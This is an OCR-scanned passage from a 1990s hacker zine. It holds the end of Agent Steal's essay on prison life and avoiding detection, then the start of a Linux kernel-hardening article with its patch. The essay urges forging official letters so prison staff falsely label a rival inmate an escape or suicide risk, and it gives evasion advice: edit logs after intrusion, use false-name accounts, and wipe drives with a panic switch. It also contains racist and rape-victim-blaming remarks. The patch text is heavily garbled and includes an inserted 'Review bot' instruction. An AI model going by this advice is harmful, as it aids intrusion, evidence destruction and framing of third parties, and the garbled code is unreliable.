networks as well, but this is not a tutorial on how to hack the BOP. I’ll save 
that for if they ever really piss me off. (humor) 


Not surprisingly, the BOP is very paranoid about computer hackers. I 
went out of my way not to be interested in their systems or to receive 
computer security related mail. Nevertheless, they tried restricting my mail 
on numerous occasions. After I filed numerous grievances and had a meeting 
with the warden, they decided I was probably going to behave myself. My 20 or 
so magazine subscriptions were permitted to come in, after a special screening. 
Despite all of that I still had occasional problems, usually when I received 
something esoteric in nature. It’s my understanding, however, that many 
hackers at other prisons have not been as fortunate as I was. 


D. IGNORANT INMATES 


You will meet some of the stupidest people on the planet in prison. I 
suppose that is why they are there, too dumb to do anything except crime. And 
for some strange reason these uneducated low class common thieves think they 
deserve your respect. In fact they will often demand it. These are the same 
people that condemn everyone who cooperated, while at the same time feel it is 
fine to break into your house or rob a store at gunpoint. These are the types 
of inmates you will be incarcerated with, and occasionally these inmates will 
try to get over on you. They will do this for no reason other than the fact 
you are an easy mark. 


There are a few tricks hackers can do to protect themselves in prison. 
The key to your success is acting before the problem escalates. It is also 
important to have someone outside (preferably another hacker) that can do some 
social engineering for you. The objective is simply to have your problem 
inmate moved to another institution. I don’t want to give away my methods but 
if staff believes that an inmate is going to cause trouble, or if they believe 
his life is in danger, they will move him or lock him away in segregation. 
Social engineered letters (official looking) or phone calls from the right 
source to the right department will often evoke brisk action. It’s also quite 
simple to make an inmate’s life quite miserable. If the BOP has reason to 
believe that an inmate is an escape risk, a suicide threat, or had pending 
charges, they will handle them much differently. Tacking these labels on an 
inmate would be a real nasty trick. I have a saying: "Hackers usually have 
the last word in arguments." Indeed. 


Chances are you won’t have many troubles in prison. This especially 
applies if you go to a camp, mind your own business, and watch your mouth. 
Nevertheless, I’ve covered all of this in the event you find yourself caught 
up in the ignorant behavior of inmates whose lives revolve around prison. And 
one last piece of advice, don’t make threats, truly stupid people are too 
stupid to fear anything, particularly an intelligent man. Just do it. 


E. POPULATION 


The distribution of blacks, whites and Hispanics varies from 
institution to institution. Overall it works out to roughly 30% white, 30% 
Hispanic and 30% black. The remaining 10% are various other races. Some 
joints have a high percent of blacks and vice versa. I’m not necessarily a 
prejudiced person, but prisons where blacks are in majority are a nightmare. 
Acting loud, disrespectful, and trying to run the place is par for the course. 


In terms of crimes, 60% of the Federal inmate population are 
incarcerated for drug related crimes. The next most common would be bank 
robbery (usually for quick drug money), then various white collar crimes. The 
Federal prison population has changed over the years. It used to be a place 
for the criminal elite. The tough drug laws have changed all of that. 


Just to quell the rumors, I’m going to cover the topic of prison rape. 
Quite simply, in medium and low security level Federal prisons it is unheard 
of. In the highs it rarely happens. When it does happen, one could argue 
that the victim was asking for it. I heard an inmate say once, "You can’t 
make no inmate suck cock that don’t wanta." Indeed. In my 41 months of 
incarceration, I never felt in any danger. I would occasionally have inmates 
that would subtly ask me questions to see where my preferences lie, but once I 
made it clear that I didn’t swing that way I would be left alone. Hell, I got 
hit on more often when I was hanging out in Hollywood! 


On the other hand, state prisons can be a hostile environment for rape 
and fighting in general. Many of us heard how Bernie S. got beat up over use 
of the phone. Indeed, I had to get busy a couple of times. Most prison 
arguments occur over three simple things: the phone, the TV and money/drugs. 
If you want to stay out of trouble in a state prison, or Federal for that 
matter, don’t use the phone too long, don’t change the channel and don’t get 
involved in gambling or drugs. As far as rape goes, pick your friends 
carefully and stick with them. And always, always, be respectful. Even if 
the guy is a fucking idiot (and most inmates are), say excuse me. 


My final piece of prison etiquette advice would be to never take your 
inmate problems to "the man" (prison staff). Despite the fact that most 
everyone in prison snitched on their co-defendants at trial, there is no 
excuse for being a prison rat. The rules are set by the prisoners themselves. 
If someone steps out of line there will likely be another inmate who will be 
happy to knock him back. In some prisons inmates are so afraid of being 
labeled a rat that they refuse to be seen talking alone with a prison staff 
member. I should close this paragraph by stating that this bit of etiquette 
is routinely ignored as other inmates will snitch on you for any reason 
whatsoever. Prison is a strange environment. 


F. DOING TIME 


You can make what you want to out of prison. Some people sit around 
and do dope all day. Others immerse themselves in a routine of work and 
exercise. I studied technology and music. Regardless, prisons are no longer 
a place of rehabilitation. They serve only to punish and conditions are only 
going to worsen. The effect is that angry, uneducated, and unproductive 
inmates are being released back into society. 


While I was incarcerated in 95/96, the prison band program was still 
in operation. I played drums for two different prison bands. It really helped 
pass the time and when I get out I will continue with my career in music. Now 
the program has been canceled, all because some senator wanted to be seen as 
being tough on crime. Bills were passed in Congress. The cable TV is gone, 
pornography mags are no longer permitted, and the weight piles are being 
removed. All this means is that prisoners will have more spare time on their 
hands, and so more guards will have to be hired to watch the prisoners. I 
don’t want to get started on this subject. Essentially what I’m saying is 
make something out of your time. Study, get into a routine and before you 
know it you’ll be going home, and a better person on top of it. 


G. DISCIPLINARY ACTIONS 


What fun is it if you go to prison and don’t get into some mischief? 
Well, I’m happy to say the only "shots" (violations) I ever received were for 
having a friend place a call with his three-way calling for me (you can’t call 
everyone collect), and drinking homemade wine. |-) The prison occasionally 
monitors your phone calls and on the seven or eight hundredth time I made a 
three-way I got caught. My punishment was ten hours of extra duty (cleaning 
up). Other punishments for shots include loss of phone use, loss of 
commissary, loss of visits, and getting thrown in the hole. Shots can also 
increase your security level and can get you transferred to a higher level 
institution. If you find yourself having trouble in this area you may want to 
pick up the book, "How to win prison disciplinary hearings", by Alan Parmelee, 
206-328-2875. 


H. ADMINISTRATIVE REMEDY 


If you have a disagreement with the way staff is handling your case 
(and you will) or another complaint, there is an administrative remedy 
procedure. First you must try to resolve it informally. Then you can file a 
form BP-9. The BP-9 goes to the warden. After that you can file a BP-10 
which goes to the region. Finally, a BP-11 goes to the National BOP 
Headquarters (Central Office). The whole procedure is a joke and takes about 
six months to complete. Delay and conquer is the BOP motto. After you 
complete the remedy process to no avail, you may file your action in a civil 
court. In some extreme cases you may take your case directly to the courts 
without exhausting the remedy process. Again, the "Prisoners Self-Help 
Litigation Manual" covers this quite well. 


My best advice with this remedy nonsense is to keep your request brief, 
clear, concise and only ask for one specific thing per form. Usually if you 
"got it coming" you will get it. If you don’t, or if the BOP can find any 
reason to deny your request, they will. 


For this reason I often took my problems outside the prison from the 
start. If it was a substantial enough issue I would inform the media, the 
director of the BOP, all three of my attorneys, my judge and the ACLU. Often 
this worked. It always pissed them off. But, alas I’m a man of principle and 
if you deprive me of my rights I’m going to raise hell. In the past I might 
have resorted to hacker tactics, like disrupting the BOP’s entire 
communication system bringing it crashing down! But...I’m rehabilitated now. 
Incidentally, most BOP officials and inmates have no concept of the kind of 
havoc a hacker can wield on an individual’s life. So until some hacker shows 
the BOP which end is up you will have to accept the fact most everyone you 
meet in prison will have only nominal respect for you. Deal with it, you’re 
not in cyberspace anymore. 


I. PRISON OFFICIALS 


There are two types, dumb and dumber. I’ve had respect for several 
but I’ve never met one that impressed me as being particularly talented in a 
way other than following orders. Typically you will find staff that are 
either just doing their job, or staff that is determined to advance their 
career. The latter take their jobs and themselves way too seriously. They 
don’t get anywhere by being nice to inmates so they are often quite curt. 
Ex-military and law enforcement wannabes are commonplace. All in all they’re 
a pain in the ass but easy to deal with. Anyone who has ever been down 
(incarcerated) for awhile knows it’s best to keep a low profile. If they don’t 
know you by name you’re in good shape. 


One of the problems that computer hackers will encounter with prison 
staff is fear and/or resentment. If you are a pretentious articulate educated 
white boy like myself you would be wise to act a little stupid. These people 
don’t want to respect you and some of them will hate everything that you stand 
for. Many dislike all inmates to begin with. And the concept of you someday 
having a great job and being successful bothers them. It’s all a rather 
bizarre environment where everyone seems to hate their jobs. I guess I’ve led 
a sheltered life. 


Before I move on, sometimes there will be certain staff members, like 
your Case Manager, that will have a substantial amount of control over your 
situation. The best way to deal with the person is to stay out of their way. 
Be polite, don’t file grievances against them and hope that they will take 
care of you when it comes time. If this doesn’t seem to work, then you need 
to be a total pain in the ass and ride them with every possible request you 
can muster. It’s especially helpful if you have outside people willing to 
make calls. Strong media attention will usually, at the very least, make the 
prison do what they are supposed to do. If you have received a lot of bad 
press, this could be a disadvantage. If your care continues to be a problem, 
the prison will transfer you to another facility where you are more likely to 
get a break. All in all how you choose to deal with staff is often a 
difficult decision. My advice is that unless you are really getting screwed 
over or really hate the prison you are in, don’t rock the boat. 


J. THE HOLE 


Segregation sucks, but chances are you will find yourself there at 
some point and usually for the most ridiculous of reasons. Sometimes you will 
wind up there because of what someone else did. The hole is a 6’ x 10’ 
concrete room with a steel bed and steel toilet. Your privileges will vary, 
but at first you get nothing but a shower every couple of days. Naturally they 
feed you, but it’s never enough, and it’s often cold. With no snacks you 
often find yourself quite hungry in-between meals. There is nothing to do 
there except read and hopefully some guard has been kind enough to throw you 
some old novel. 


Disciplinary actions will land you in the hole for typically a week or 
two. In some cases you might get stuck there for a month or three. It depends 
on the shot and on the Lieutenant that sent you there. Sometimes people never 
leave the hole. 


K. GOOD TIME 


You get 54 days per year off of your sentence for good behavior. If 
anyone tells you that a bill is going to be passed to give 108 days, they are 
lying. 54 days a year works out to 15% and you have to do something 
significant to justify getting that taken away. The BOP has come up with the 
most complicated and ridiculous way to calculate how much good time you have 
earned. They have a book about three inches thick that discusses how to 
calculate your exact release date. I studied the book intensely and came to 
the conclusion that the only purpose it serves is to covertly steal a few days 
of good time from you. Go figure. 


L. HALFWAY HOUSE 

All "eligible" inmates are to serve the last 10% of their sentence 
(not to exceed six months) in a Community Corrections Center (CCC). At the 
CCC, which is nothing more than a large house in a bad part of town, you are to 
find a job in the community and spend your evenings and nights at the CCC. You 
have to give 25% of the gross amount of your check to the CCC to pay for all of 
your expenses, unless you are a rare Federal prisoner sentenced to serve all of 
your time at the CCC in which case it is 10%. They will breathalyse and 
urinanalyse you routinely to make sure you are not having too much fun. If 
you’re a good little hacker you’ll get a weekend pass so you can stay out all 
night. Most CCCs will transfer you to home confinement status after a few 
weeks. This means you can move into your own place (if they approve it) but 
still have to be in for the evenings. They check up on you by phone. And no, 
you are not allowed call forwarding, silly rabbit. 


M. SUPERVISED RELEASE 


Just when you think the fun is all over, after you are released from 
prison or the CCC, you will be required to report to a Probation Officer. For 
the next 3 to 5 years you will be on Supervised Release. The government 
abolished parole, thereby preventing convicts from getting out of prison early. 
Despite this they still want to keep tabs on you for a while. 


Supervised Release, in my opinion, is nothing more than extended 
punishment. You are not a free man able to travel and work as you please. 
All of your activities will have to be presented to your Probation Officer 
(P.O.). And probation is essentially what Supervised Release is. Your P.O. 
can violate you for any technical violations and send you back to prison for 
several months, or over a year. If you have ANY history of drug use you will 
be required to submit to random (weekly) urinalyses. If you come up dirty it’s 
back to the joint. 


As a hacker you may find that your access to work with, or possession 
of computer equipment may be restricted. While this may sound pragmatic to 
the public, in practice it serves no other purpose than to punish and limit a 
former hacker’s ability to support himself. With computers at libraries, copy 
shops, schools, and virtually everywhere, it’s much like restricting someone 
who used a car to get to and from a bank robbery to not ever drive again. If a 
hacker is predisposed to hacking he’s going to be able to do it with or 
without restrictions. In reality many hackers don’t even need a computer to 
achieve their goals. As you probably know a phone and a little social 
engineering go a long way. 


But with any luck you will be assigned a reasonable P.O. and you will 
stay out of trouble. If you give your P.O. no cause to keep an eye on you, 
you may find the reins loosening up. You may also be able to have your 
Supervised Release terminated early by the court. After a year or so, with 
good cause, and all of your government debts paid, it might be plausible. Hire 
an attorney, file a motion. 


For many convicts Supervised Release is simply too much like being in 
prison. For those it is best to violate, go back to prison for a few months, 
and hope the judge terminates their Supervised Release. Although the judge 
may continue your supervision, he/she typically will not. 


PART III 


A. HOW TO AVOID DETECTION 


5.txt Wed Apr 26 09:43:42 2017 16 


Now that you know what kind of trouble you are facing I’ll go back to 
the beginning. If what I’ve just covered doesn’t make you want to stop 
hacking then you had better learn how to protect yourself. Many hackers feel 
they have some god given constitutional right to hack. Many don’t believe it 
should be illegal. Well, neurosis and personality disorders work in strange 
ways. Regardless, I’ll cover the topic of stealth. Please note that I in no 
way advocate or encourage hacking. This technical information is being 
provided for educational purposes only. And as I mentioned you may feel you 
have a perfectly legitimate reason for avoiding detection, simply trying to 
stay clear of other hackers would be an acceptable reason. This paper (I’m 
sure) will also serve to educate law enforcement officials on the methods 
currently being deployed by hackers to avoid detection. 


Avoiding being identified while hacking is actually a rather simple 
feat, assuming you follow a few simple rules. Unfortunately, very few 
people bother with them, due typically to arrogance and ego, which, as I have 
noticed, seems to be a trait that is a prerequisite to being a successful 
hacker. I’ve never met a hacker who didn’t think he was the shit. And when 
it gets right down to it that was the reason that Mitnick got caught. I’ll 
examine this incident a little later. 


So I will list here a few of the basic rules I used, and then I’ll 
expound upon them a little later. 


* Most important of all, I would never tell another hacker who I was, 
where I lived, or give out my home phone number. (OK, I screwed up 
on that one.) 


* I didn’t set up network access accounts up in my real name or use 
my real address. 


* I didn’t set up phone numbers in my real name. 


* I would never dial directly in to anything I was hacking. 


* I would set up some kind of notification system that would let me 
know if someone was trying to figure out where I was connecting from. 


* I didn’t transmit personal data on systems I had hacked into. 


* When I used a network or computer for work or social objectives, I 
tried to keep it separate from my hacking. 


* I never assumed that just by connecting through a bunch of different 
networks or using cellular phones that I was safe. Even though most 
cellular networks do not have triangulation equipment installed they 
still have the ability to narrow a transmitting location down to a 
square mile or even a few blocks, this even well after you have 
disconnected. 


* The minute I got into a system I would examine and edit all of the 
logs. I would also look for email daemons on admin or admin 
associated accts. that sent out copies of the system security logs. 


* When setting up accts. on systems I would use different login ID’s. 


* I never went to hacker cons. (Until I worked with the FBI) 


* I would change network access dial up accts. and dial up numbers 
every so often. I would also change living locations every 8-12 
months. 


* I would keep in mind that the numbers I dialed on my phone could 
eventually be used to track me again. For example, if I called my 
girlfriend frequently, after I changed numbers and location I might 
still be calling that number. The telcos now have toll record 
database software that can cross reference and track this type of thing. 


* I rarely used IRC until I worked with the FBI. If -you- must, change 


It’s obviously a bit complex, but you get the idea. My point being that 
avoiding detection is not a simple task. If someone wants you they can get 
you. There really isn’t such a thing as a secure connection; virtually 
everything can be traced, short of a highly directional data burst satellite 
uplink. At that point the Air Force National Reconnaissance Office (NRO) or 
the NSA would have to get involved, big bucks. 


Aside from setting up physical hardware another idea would be to find 
a Sysadmin that will let you use his system to connect through. If you trust 
him to tell you if there has been an inquiry regarding your connection then 
you might be OK. It would also be wise to set up background processes that 
monitor finger and other related probes of your account. Watch them watch you. 


As I mentioned earlier if you fall under surveillance there will be 
2-way radio traffic in your vicinity. Using the Opto-Electronics Explorer 
will detect this and you can further investigate to see who it may be. Good 
physical surveillance is difficult to detect. Bad physical surveillance is 
comical. 


C. MORE PROTECTION 


I covered encryption earlier and as I mentioned it really is not safe 
to assume that it will protect you from someone who takes possession of your 
computer. The only truly safe encryption would be a military spec. 
hardware/software implementation. When people talk about secure encryption 
they are not taking into account that all the power of a Government might be 
trying to crack it, and that they will have physical access to the encryption 
device, your computer! This leaves us with one other method, destroying the 
data. Now this in and of itself can be construed as obstruction of 
justice. However, should you feel the need to instantly destroy all of the 
data on your hard drive, for oh.. let’s say educational purposes. I would 
suggest mounting a bulk magnetic tape eraser next to your hard drive. You can 
pick one up at Radio Hack, err Shack. One flip of the panic switch, thus 
powering up the eraser while the drive is turning, and ZAP! Mount a switch 
next to your bed. ;-) 


This may or may not destroy all of the data on your drive. If the 
drive disk is removed and placed on a special reader some data may still be 
recovered. This is a science in itself. DOD spec. requires that a hard drive 
be written to with 0’s 7 times before it is considered erased. Simply erasing 
a file, formatting, or defragging will not suffice. Look for a shareware 
utility named "BCwipe". This will erase to military spec. You may also want 
to install some type of program that auto erases under certain conditions. 
Regardless, computer specialists that work with computer crime are trained to 
look for this. 


There are still a lot of issues that could be covered with respect to 
avoiding detection and keeping clear of hackers. In fact I could fill a book, 
and in retrospect I probably should have. But I told a lot of people I would 
write this file and make it public. Hope you found it of some assistance. 


CLOSURE 


What a long strange trip it’s been. I have a great deal of mixed 
emotions about my whole ordeal. I can however, say that I HAVE benefited 
from my incarceration. However, it certainly was not on the behalf of how I 
was handled by the government. No, despite their efforts to kick me when I 
was down, use me, turn their backs after I had assisted them, and in general, 
just violate my rights, I was still able to emerge better educated than when I 
went in. But frankly, my release from prison was just in the nick of time. 
The long term effects of incarceration and stress were creeping up on me, and 
I could see prison conditions were worsening. It’s hard to express the 
poignancy of the situation but the majority of those incarcerated feel that if 
drastic changes are not made America is due for some serious turmoil, perhaps 
even a civil war. Yes, the criminal justice system is that screwed up. The 
Nation’s thirst for vengeance on criminals is leading us into a vicious 
feedback loop of crime and punishment, and once again crime. Quite simply, 
the system is not working. My purpose in writing this article was not to send 
any kind of message. I’m not telling you how not to get caught and I’m not 
telling you to stop hacking. I wrote this simply because I feel like I owe it 
to whomever might get use of it. For some strange reason I am oddly compelled 
to tell you what happened to me. Perhaps this is some kind of therapy, 
perhaps it’s just my ego, perhaps I just want to help some poor 18 year old 
hacker who really doesn’t know what he is getting himself in to. Whatever the 
reason, I just sat down one day and started writing. 


If there is a central theme to this article it would be how ugly your 
world can become. Once you get grabbed by the law, sucked into their vacuum, 
and they shine the spotlight on you, there will be little you can do to 
protect yourself. The vultures and predators will try to pick what they can 
off of you. It’s open season for the U.S. Attorneys, your attorney, other 
inmates, and prison officials. You become fair game. Defending yourself from 
all of these forces will require all of your wits, all of your resources, and 
occasionally your fists. 


Furthering the humiliation, the press, as a general rule, will not be 
concerned with presenting the truth. They will print what suits them and 
often omit many relevant facts. If you have read any of the 5 books I am 
covered in you will no doubt have a rather jaded opinion of me. Let me assure 
you that if you met me today you would quickly see that I am quite likable and 
not the villain many (especially Jon Littman) have made me out to be. You may 
not agree with how I lived my life, but you wouldn’t have any trouble 
understanding why I chose to live it that way. Granted I’ve made my mistakes, 
growing up has been a long road for me. Nevertheless, I have no shortage of 
good friends. Friends that I am immensely loyal to. But if you believe 
everything you read you’d have the impression that Mitnick is a vindictive 
loser, Poulsen a furtive stalker, and I a two faced rat. All of those 
assessments would be incorrect. 


So much for first impressions. I just hope I was able to enlighten 
you and in some way to help you make the right choice. Whether it’s 
protecting yourself from what could be a traumatic life altering experience, 
or compelling you to focus your computer skills on other avenues, it’s 
important for you to know the program, the language, and the rules. 


See you in the movies. 


Agent Steal 
1997 
[ Hardening the Linux Kernel (series 2.0.x) 


[ route|daemon9 <route@infonexus.com> 


----[ Introduction and Impetus 


Linux. The cutest Unix-like O/S alive today. Everyone knows at least 
*one* person who has at least *one* Linux machine. Linux, whatever your 
opinion of it, is out there, and is being used by more and more people. Many 
of the people using Linux are using it in multi-user environments. All of a 
sudden they find security to be a big issue. This article is for those people. 


This article covers a few areas of potential insecurity in the Linux O/S 
and attempts to improve upon them. It contains several security related 
kernel patches for the 2.0.x kernels (each has been tested successfully on the 
2.0.3x kernels and most should work on older 2.0.x kernels; see each 
subsection for more info). 


These are kernel patches. They do nothing for user-land security. If you 
can not set permissions and configure services correctly, you should not be 
running a Unix machine. 


These patches are not bugfixes. They are preventative security fixes. 
They are intended to prevent possible problems and breaches of security from 
occurring. In some cases they can remove (or at least severely complicate) the 
threat of many of today’s most popular methods of attack. 


These patches are not really useful on a single-user machine. They are 
really intended for a multi-user box. 


This article is for those of you who want better security out of your Linux 
O/S. If you want to go a bit further, look into the POSIX.1e (POSIX 6) stuff. 
POSIX.1e is a security model that basically separates identity and privilege. 
Effectively, it splits superuser privileges into different ‘capabilities’. 
Additionally, the Linux POSIX.1e (linux-privs) implementation offers a bitmapped 
securelevel, kernel-based auditing (userland audit hooks are being developed), 
and ACLs. See: http://parc.power.net/morgan/Orange-Linux/linux-privs/index.html 


To sum it up, in this article, we explore a few ways to make the multi-user 
Linux machine a bit more secure and resilient to attack. 


----[ The Patches 


procfs patch 


Tested on: 2.0.0 + 
Author: route 


Why should we allow anyone to be able to view info on any process? 


Normally, /bin/ps can show process listing for every process in the 
kernel’s process table, regardless of ownership. A non-privileged user can 
see all the running processes on a system. This can include information that 
could be used in some forms of known / guessed PID-based attacks, not to 
mention the obvious lack of privacy. /bin/ps gets this process information by 
reading the /proc filesystem. 


The /proc filesystem is a virtual filesystem interface into the O/S which 
provides all kinds of good information including the status of various 
portions of the running kernel and a list of currently running processes. It 
has a filesystem interface, which means it has file-system-like access 
controls. As such, we can change the default access permissions on the inode 
from 555 to 500. 


And that’s the patch. We just change the permissions on the inode from 
S_IFDIR | S_IRUGO | S_IXUGO to S_IFDIR | S_IRUSR | S_IXUSR. 


trusted path execution patch 


Tested on: 2.0.0 + 
Author: route (2.0.x version, original 1.x patch by merc) 


Why should we allow arbitrary programs execution rights? 


Consider this scenario: You are the administrator of a multi-user Linux 
machine. All of a sudden there is a new bug in the Pentium(tm) processor! 
As it happens, this bug causes the CPU to lock up entirely, requiring a cold 
reboot. This bug is also exploitable by any user regardless of privilege. All 
it necessitates is for the malevolent user to 1) get the source, 2) compile the 
exploit, and 3) execute the program. 


Whelp... 1) has happened. You cannot prevent anyone from getting it. It’s 
out there. You could remove permissions from the compiler on your machine or 
remove the binary entirely, but this does not stop the user from compiling 
the exploit elsewhere, and getting the binary on your machine somehow. You 
cannot prevent 2) either. However, if you only allow binaries to be executed 
from a trusted path, you can prevent 3) from happening. A trusted path is 
one that is inside a root owned directory that is not group or world 
writable. /bin, /usr/bin, /usr/local/bin, are (under normal circumstances) 
considered trusted. Any non-root user’s home directory is not trusted, nor is 
/tmp. Be warned: This patch is a major annoyance to users who like to execute 
code and scripts from their home directories! It will make you extremely 
un-popular as far as these people are concerned. It will also let you sleep 
easier at night knowing that no unscrupulous persons will be executing 
malicious bits of code on your machine. 


Before any call to exec is allowed to run, we open the inode of the 
directory that the executable lives in and check ownership and permissions. 
If the directory is not owned by root, or is writable to group or other, we 
consider that untrusted. 


securelevel patch 


Tested on: 2.0.26 + 
Author: route 


Damnit, if I set the immutable and append only bits, I did it for a reason. 


This patch isn’t really much of a patch. It simply bumps the securelevel 
up, to 1 from 0. This freezes the immutable and append-only bits on files, 
keeping anyone from changing them (from the normal chattr interface). Before 
turning this on, you should of course make certain key files immutable, and 
logfiles append-only. It is still possible to open the raw disk device, 
however. Your average cut and paste hacker will probably not know how to do 
this. 


stack execution disabling patch and symlink patch 


Tested on: 2.0.30 + 
Author: solar designer 


From the documentation accompanying SD’s patch: 
This patch is intended to add protection against two classes of security 
holes: buffer overflows and symlinks in /tmp. 


Most buffer overflow exploits are based on overwriting a function’s return 
address on the stack to point to some arbitrary code, which is also put 
onto the stack. If the stack area is non-executable, buffer overflow 
vulnerabilities become harder to exploit. 


Another way to exploit a buffer overflow is to point the return address to 
a function in libc, usually system(). This patch also changes the default 
address that shared libraries are mmap()ed at to make it always contain a 
zero byte. This makes it impossible to specify any more data (parameters 
to the function, or more copies of the return address when filling with a 
pattern) in an exploit that has to do with ASCIIZ strings (this is the 
case for most overflow vulnerabilities). 


However, note that this patch is by no means a complete solution, it just 
adds an extra layer of security. Some buffer overflow vulnerabilities will 
still remain exploitable in a more complicated way. The reason for using such 
a patch is to protect against some of the buffer overflow vulnerabilities 
that are yet unknown. 


In this version of my patch I also added a symlink security fix, originally 
by Andrew Tridgell. I changed it to prevent using hard links too, by 
simply not allowing non-root users to create hard links to files they don’t 
own, in +t directories. This seems to be the desired behavior anyway, since 
otherwise users couldn’t remove such links they just created. I also added 
exploit attempt logging, this code is shared with the non-executable stack 
stuff, and was the reason to make it a single patch instead of two separate 
ones. You can enable them separately anyway. 


GID split privilege patch 


Tested on: 2.0.30 + 
Author: Original version DaveG, updated for 2.0.33 by route 


From the documentation accompanying Dave’s original patch: 
This is a simple kernel patch that allows you to perform certain 
privileged operations without requiring root access. With this patch 
three groups become privileged groups allowed to do different operations 
within the kernel. 


GID 16 : a program running with group 16 privileges can bind to a port 
< 1024. This allows programs like: rlogin, rcp, rsh, and ssh 
to run setgid 16 instead of setuid 0(root). This also allows 
servers that need to run as root to bind to a privileged port 
like named, to also run setgid 16. 


GID 17 : any program running under GID 17 privileges will be able to 
create a raw socket. Programs like ping and traceroute can now 
be made to run setgid 17 instead of setuid 0(root). 


GID 18 : This group is for SOCK_PACKET. This isn’t useful for most people, 
so if you don’t know what it is, don’t worry about it. 


Limitations 


Since this is a simple patch, it is VERY limited. First of all, there 
is no support for supplementary groups. This means that you can’t stack 
these privileges. If you need GID 16 and 17, there isn’t much you can do 
about it. 


----[ Installation 
This patchfile has been tested and verified to work against the latest 
stable release of the linux kernel (as of this writing, 2.0.33). It should 
work against other 2.0.x releases as well with little or no modification. THIS 
IS NOT A GUARANTEE! Please do not send me your failed patch logs from older 
kernels. Take this as a perfect opportunity to upgrade your kernel to the 
latest release. Note that several of these patches are for X86-Linux only. 
Sorry. 


1. Create the symlink: 


`cd /usr/src` 
`ln -s linux-KERNEL_VERSION linux-stock` 


2. Apply the kernel patch: 


`patch < slinux.patch >& patch.err` 


2a. Examine the error file for any failed hunks. Figure where you went wrong 
in life: 


`grep fail patch.err` 


3. Configure your kernel: 


`make config` OR `make menuconfig` OR `make xconfig` 


4. You will need to enable prompting for experimental code in your kernel and 
turn on the patches individually. 


5. To configure the split GID privilege patch, add the following to your 
/etc/group file: 


`cat >> /etc/group` 
priv_port::16:user1, user2, user3 
raw_sock::17:user1, user2 
sock_pak::18:user2, user3 

^D 


Where `userx` are the usernames of the users you wish to give these 
permissions to. Next, fix the corresponding group and permissions on the 
binaries you wish to strip root privileges from: 


`chgrp raw_sock /bin/ping` 
`chmod 2755 /bin/ping` 


----[ The patchfile 


This patchfile should be extracted with the Phrack Magazine Extraction 
Utility included in this (and every) issue. 


<++> slinux.patch 
diff -ru linux-stock/Documentation/Configure.help linux-patched/Documentation/Configure.hel 


--- linux-stock/Documentation/Configure.help Fri Sep 5 20:43:58 1997 
+++ linux-patched/Documentation/Configure.help Mon Nov 10 22:02:36 1997 
@@ -720,6 +720,77 @@ 
later load the module when you install the JDK or find an interesting 
Java program that you can’t live without. 


+Non-executable user stack area (EXPERIMENTAL) 

+CONFIG_STACKEXEC 

+ Most buffer overflow exploits are based on overwriting a function’s 

+ return address on the stack to point to some arbitrary code, which is 
+ also put onto the stack. If the stack area is non-executable, buffer 
+ overflow vulnerabilities become harder to exploit. However, a few 
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t programs depend on the stack being executable, and might stop working 
t unless you also enable GCC trampolines autodetection below, or enable 
+ the stack area execution permission for every such program separately 
t using chstk.c. If you don’t know what all this is about, or don’t care 
t about security that much, say N. 


tAutodetect GCC trampolines 
tCONFIG_STACKEXEC_AUTOENABLE 
+t GCC generates trampolines on the stack to correctly pass control to 

t+ nested functions when calling from outside. This requires the stack 

+t being executable. When this option is enabled, programs containing 

t+ trampolines will automatically get their stack area executable when 

t a trampoline is found. However, in some cases this autodetection can 

+t be fooled in a buffer overflow exploit, so it is more secure to 

t disable this option and use chstk.c to enable the stack area execution 
+ permission for every such program separately. If you’re too lazy, 

t answer Y. 


tLog buffer overflow exploit attempts 

tCONFIG STACKEXEC_LOG 

+t This option enables logging of buffer overflow exploit attempts. No 
+ more than one attempt per minute is logged, so this is safe. Say Y. 


tProcess table viewing restriction (EXPERIMENTAL) 
tCONFIG_PROC_RESTRICT 
+ This option enables process table viewing restriction. Users will only 


be able to get status of processes they own, with the exception the 
t+ root user, who can get an entire process table listing. This patch 
t should not cause any problems with other programs but it is not fully 


tested under every possible contingency. You must enable the /proc 
+t filesystem for this option to be of any use. If you run a multi-user 
tf system and are reasonably concerned with privacy and/or security, say Y. 
tTrusted path execution (EXPERIMENTAL) 
tCONFIG_TPE 
t+ This option enables trusted path execution. Binaries are considered 
t «6.‘trusted* if they live in a root owned directory that is not group or 
+t world writable. If an attempt is made to execute a program from a non 
t trusted directory, it will simply not be allowed to run. This is 
t quite useful on a multi-user system where security is an issue. Users 
+t will not be able to compile and execute arbitrary programs (read: evil) 
+ from their home directories, as these directories are not trusted. 
+t This option is useless on a single user machine. 


tTrusted path execution (EXPERIMENTAL) 
tCONFIG_TPE_LOG 
+ This option enables logging of execution attempts from non-trusted 
+t paths. 


+Secure mode (EXPERIMENTAL) 

+tCONFIG_SECURE_ON 

+ This bumps up the securelevel from 0 to 1. When the securelevel is ‘on’, 
t+ immutable and append-only bits cannot be set or cleared. If you are not 


t concerned with security, you can say ‘N*. 
tSplit Network Groups (EXPERIMENTAL) 
tCONFIG SPLIT_GID 
+ This is a simple kernel patch that allows you to perform certain 

+t privileged operations with out requiring root access. With this patch 

t three groups become privileged groups allowed to do different operations 
t within the kernel. 

t GID 16 allows programs to bind to privledged ports. 

+t GID 17 allows programs to open raw sockets. 

t GID 18 allows programs to open sock packets. 


Processor type 
CONFIG_M386 
This is the processor type of your CPU. It is used for optimizing 
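Review bot: the CONFIG_TPE_LOG entry is titled "Trusted path execution (EXPERIMENTAL)", identical to the CONFIG_TPE entry just above it, so help lookups show two entries with the same heading for different options; retitle it to match the config.in prompt, e.g. "+Log untrusted path execution attempts (EXPERIMENTAL)". While touching this hunk, "privledged ports" in the GID 16 line should read "privileged ports", and "with out requiring root access" should read "without requiring root access" (the same phrase also appears in the article body).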
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new mars-nwe and other fil 


At 


writing none of these are available. 
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unless you r 


+Symlink security 


EXP 


( 


fix 


ERIM 


ENTAL) 


+CONFIG_SYMLINK_FIX 
lass of security hole 
ng a symbolic 
When the victim then writes to that file they 
Enabling this option fixes 


A very commo 
a malicious 
another user 


inadvertently write to the wrong file. 


nc 
user creati 
is fite. 


servers. 


the time of 


So it’s safest to say N here 


this feature. 


on UNIX-like systems involves 


link in /tmp 


pointing at 


this class of hole by preventing a process from following a link 


which is in a +t directory unless they own the 
fix does not affect links owned by root, 
created by someone having root access already. 
from using a hard link instead, 


lin 


k. However, 


users to create hard links in a +t directory to files they don’t 


own. 
is more impo 


attempts. 
safe. Say Y. 


rtant. 


Minix fs support 
CONFIG _MINIX_FS 


+Log symlink exploit attempts 
+CONFIG_SYMLINK_LOG 
This option enables logging of symlink 
No more than one attempt per minute is 


Note that this fix might break things. 


(and hard 


link) 
logged, 


exploit 


this 
since these could only be 
